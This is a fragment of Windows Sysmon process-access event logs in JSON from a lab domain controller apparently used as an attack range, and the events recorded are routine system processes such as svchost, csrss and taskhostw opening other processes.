{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6447,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.632\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-0010EEAA0900}\r\nSourceProcessId: 1824\r\nSourceThreadId: 1524\r\nSourceImage: C:\\Windows\\system32\\taskhostw.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-00104CBA0900}\r\nTargetProcessId: 4644\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|UNKNOWN(00007FFD152C11E2)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.632","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-0010EEAA0900}","SourceProcessId":"1824","SourceThreadId":"1524","SourceImage":"C:\\Windows\\system32\\taskhostw.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-00104CBA0900}","TargetProcessId":"4644","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|UNKNOWN(00007FFD152C11E2)","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6448,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.632\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-00104CBA0900}\r\nTargetProcessId: 4644\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.632","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-00104CBA0900}","TargetProcessId":"4644","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6449,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.632\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.632","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6450,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.632\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.632","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6451,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.632\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.632","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6452,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.632\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.632","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6453,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.632\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.632","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6454,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.632\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.632","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6455,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.632\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 